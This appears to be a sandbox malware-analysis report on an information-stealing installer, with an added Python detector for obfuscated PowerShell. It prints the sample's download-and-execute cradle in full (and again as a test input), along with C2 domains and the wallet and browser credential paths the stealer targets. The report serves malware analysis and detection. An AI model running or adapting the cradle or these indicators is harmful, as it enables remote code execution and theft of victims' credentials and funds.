Source: C:\Users\user\Desktop\setup.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: setup.exe | Static file information: File size 74584760 > 1048576

              Data Obfuscation

              Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; -
              Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; -Jump to behavior
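The powershell command line recorded here and in the System Summary above is a download-and-execute cradle whose only obfuscation is randomised letter case in cmdlet, parameter and type names, plus the abbreviated "-exec bypass" spelling of -ExecutionPolicy, which powershell.exe accepts because it resolves any unambiguous parameter prefix. Both tricks defeat a case-sensitive or full-spelling string match while leaving the semantics intact, so the detection has to normalise case and match on primitives rather than exact spellings. The script below is an added example, not part of the Joe Sandbox report; it scores the report's command line against two constructed comparison lines (a routine administrative invocation and a WebClient-style cradle using "-ep", with the reserved name example.invalid as its host). The rule list and weights are this example's own choices.

```python
import re

# Constructed test inputs: the command line recorded in the report above, plus two
# lines written for this example (example.invalid is a reserved, non-resolving name).
REPORT_CMDLINE = (
    "powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = "
    "[Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='"
    "+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 "
    "(Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 "
    "Safari/57.36'; IEx $Ptsr.Content; -"
)
ADMIN_CMDLINE = r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1"
WEBCLIENT_CMDLINE = ("powershell -ep bypass -nop -w hidden \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('https://example.invalid/a.ps1')\"")

# Rules run against the lower-cased command line, because PowerShell cmdlets, parameters
# and type names are case-insensitive and the sample relies on exactly that. powershell.exe
# also accepts any unambiguous prefix of a parameter name, so "-ExecutionPolicy" is only
# one spelling; the alternation covers the abbreviations commonly seen, not every prefix.
RULES = [
    ("execution-policy bypass", 1,
     re.compile(r"-(?:ex|exe|exec|executionpolicy|ep)\s+(?:bypass|unrestricted)")),
    ("hidden window", 1, re.compile(r"-w(?:indowstyle)?\s+hidden")),
    ("download primitive", 2,
     re.compile(r"\biwr\b|invoke-webrequest|\birm\b|invoke-restmethod|downloadstring"
                r"|downloadfile|net\.webclient|start-bitstransfer")),
    ("eval primitive", 2, re.compile(r"\biex\b|invoke-expression")),
    ("host fingerprint in request", 1, re.compile(r"\$env:computername|\$env:username")),
    ("forces TLS protocol", 1, re.compile(r"securityprotocol")),
]
WORD_RE = re.compile(r"[A-Za-z]{4,}")


def random_case_tokens(cmdline):
    """Tokens whose casing looks machine-randomised: an upper-case run followed by a
    lower-case letter AND a lower-to-upper transition in the same word. PascalCase and
    camelCase identifiers (ExecutionPolicy, compName) and acronyms (KHTML, IPAddress)
    satisfy at most one of the two conditions and are not counted."""
    return [w for w in WORD_RE.findall(cmdline)
            if re.search(r"[A-Z]{2,}[a-z]", w) and re.search(r"[a-z][A-Z]", w)]


def analyze(cmdline, random_case_threshold=3):
    """Score a powershell command line. 'cradle' means a download primitive and an eval
    primitive are both present; 'flagged' also fires on enough weaker indicators."""
    lowered = cmdline.lower()
    hits, score = [], 0
    for name, weight, rx in RULES:
        if rx.search(lowered):
            hits.append(name)
            score += weight
    odd = random_case_tokens(cmdline)
    if len(odd) >= random_case_threshold:
        hits.append("randomised casing")
        score += 2
    cradle = "download primitive" in hits and "eval primitive" in hits
    return {"score": score, "hits": hits, "cradle": cradle,
            "flagged": cradle or score >= 4, "random_case_tokens": odd}


if __name__ == "__main__":
    for label, cmd in [("report", REPORT_CMDLINE), ("admin", ADMIN_CMDLINE),
                       ("webclient", WEBCLIENT_CMDLINE)]:
        r = analyze(cmd)
        print(f"{label:10} score={r['score']:2} cradle={r['cradle']} hits={r['hits']}")
```

The report's line scores on every rule except the hidden window, which it does not need because the parent is an installer that already owns a window. The administrative line trips only the execution-policy rule and stays below the threshold, which is the false-positive case any such rule must survive: "-ExecutionPolicy Bypass -File" is routine in logon and backup scripts and is not evidence on its own.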
Source: C:\Users\user\Desktop\setup.exe :: Code function: 0_3_03E6CF96 pushfd ; iretd 0_3_03E6CF9D
Source: C:\Users\user\Desktop\setup.exe :: Code function: 0_3_03E6CF9E pushfd ; iretd 0_3_03E6CFA1
Source: C:\Users\user\Desktop\setup.exe :: Code function: 0_3_03E6CF62 pushad ; iretd 0_3_03E6CF65
Source: C:\Users\user\Desktop\setup.exe :: Code function: 0_3_03E6CF4E push esp; iretd 0_3_03E6CF55
Source: C:\Users\user\Desktop\setup.exe :: Code function: 0_3_03E6CF56 push esp; iretd 0_3_03E6CF59
Source: C:\Users\user\Desktop\setup.exe :: Code function: 0_3_03E6CF5A pushad ; iretd 0_3_03E6CF61
Source: C:\Users\user\Desktop\setup.exe :: Code function: 0_3_03E6A41A push esp; ret 0_3_03E6A41B
Source: C:\Users\user\Desktop\setup.exe :: Code function: 0_3_008D7C47 push FFFFFFB8h; retf 0_3_008D7C4A
Source: C:\Users\user\Desktop\setup.exe :: Code function: 0_3_0086E7A5 push ds; retf 0_3_0086E7E9
Source: C:\Users\user\Desktop\setup.exe :: Code function: 0_3_0086E3E5 pushfd ; retf 0_3_0086E3F9
Source: C:\Users\user\Desktop\setup.exe :: Code function: 0_3_0086E6E2 push es; retf 0_3_0086E729
Source: C:\Users\user\Desktop\setup.exe :: Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\setup.exe :: Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\setup.exe :: WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\setup.exe :: System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Window / User API: threadDelayed 2438
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Window / User API: threadDelayed 1300
Source: C:\Users\user\Desktop\setup.exe TID: 7188 :: Thread sleep time: -210000s >= -30000s
Source: C:\Users\user\Desktop\setup.exe TID: 7200 :: Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7420 :: Thread sleep count: 2438 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7416 :: Thread sleep count: 1300 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440 :: Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\setup.exe :: WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: setup.exe, 00000000.00000002.1508611151.000000000087C000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507529583.000000000087C000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1417555343.0000000000888000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1376392754.0000000000888000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: Hyper-V RAW~5
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: outlook.office.comVMware20,11696492231s
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: AMC password management pageVMware20,11696492231
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: setup.exe, 00000000.00000002.1508611151.000000000087C000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507529583.000000000087C000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1417555343.0000000000888000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507819882.000000000084E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.1508611151.000000000084F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1376392754.0000000000888000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507529583.000000000084D000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: Hyper-V RAW
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB7000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: - GDCDYNVMware20,11696492231p
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: discord.comVMware20,11696492231f
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: global block list test formVMware20,11696492231
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: dev.azure.comVMware20,11696492231j
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: tasks.office.comVMware20,11696492231o
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: C:\Users\user\Desktop\setup.exe :: Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: setup.exe, 00000000.00000002.1509456386.0000000003190000.00000040.10000000.00040000.00000000.sdmp :: String found in binary or memory: cloudewahsj.shop
Source: setup.exe, 00000000.00000002.1509456386.0000000003190000.00000040.10000000.00040000.00000000.sdmp :: String found in binary or memory: rabidcowse.shop
Source: setup.exe, 00000000.00000002.1509456386.0000000003190000.00000040.10000000.00040000.00000000.sdmp :: String found in binary or memory: noisycuttej.shop
Source: setup.exe, 00000000.00000002.1509456386.0000000003190000.00000040.10000000.00040000.00000000.sdmp :: String found in binary or memory: tirepublicerj.shop
Source: setup.exe, 00000000.00000002.1509456386.0000000003190000.00000040.10000000.00040000.00000000.sdmp :: String found in binary or memory: framekgirus.shop
Source: setup.exe, 00000000.00000002.1509456386.0000000003190000.00000040.10000000.00040000.00000000.sdmp :: String found in binary or memory: wholersorie.shop
Source: setup.exe, 00000000.00000002.1509456386.0000000003190000.00000040.10000000.00040000.00000000.sdmp :: String found in binary or memory: abruptyopsn.shop
Source: setup.exe, 00000000.00000002.1509456386.0000000003190000.00000040.10000000.00040000.00000000.sdmp :: String found in binary or memory: nearycrepso.shop
Source: setup.exe, 00000000.00000002.1509456386.0000000003190000.00000040.10000000.00040000.00000000.sdmp :: String found in binary or memory: fairiespar.cyou
Source: C:\Users\user\Desktop\setup.exe :: Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; -
Source: C:\Users\user\Desktop\setup.exe :: Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\setup.exe :: Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: setup.exe, 00000000.00000003.1429618782.00000000008DA000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\setup.exe :: WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match :: File source: Process Memory Space: setup.exe PID: 5916, type: MEMORYSTR
Source: Yara match :: File source: sslproxydump.pcap, type: PCAP
Source: setup.exe, 00000000.00000002.1508611151.000000000087C000.00000004.00000020.00020000.00000000.sdmp :: String found in binary or memory: Wallets/Electrum
Source: setup.exe, 00000000.00000002.1508611151.000000000087C000.00000004.00000020.00020000.00000000.sdmp :: String found in binary or memory: Wallets/ElectronCash
Source: setup.exe :: String found in binary or memory: Jaxx Liberty
Source: setup.exe, 00000000.00000002.1508611151.000000000087C000.00000004.00000020.00020000.00000000.sdmp :: String found in binary or memory: window-state.json
Source: setup.exe, 00000000.00000003.1417555343.0000000000872000.00000004.00000020.00020000.00000000.sdmp :: String found in binary or memory: Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520}
Source: setup.exe :: String found in binary or memory: Wallets/Exodus
Source: setup.exe, 00000000.00000002.1508611151.000000000087C000.00000004.00000020.00020000.00000000.sdmp :: String found in binary or memory: Wallets/Ethereum
Source: setup.exe :: String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: setup.exe :: String found in binary or memory: keystore
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffffla
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
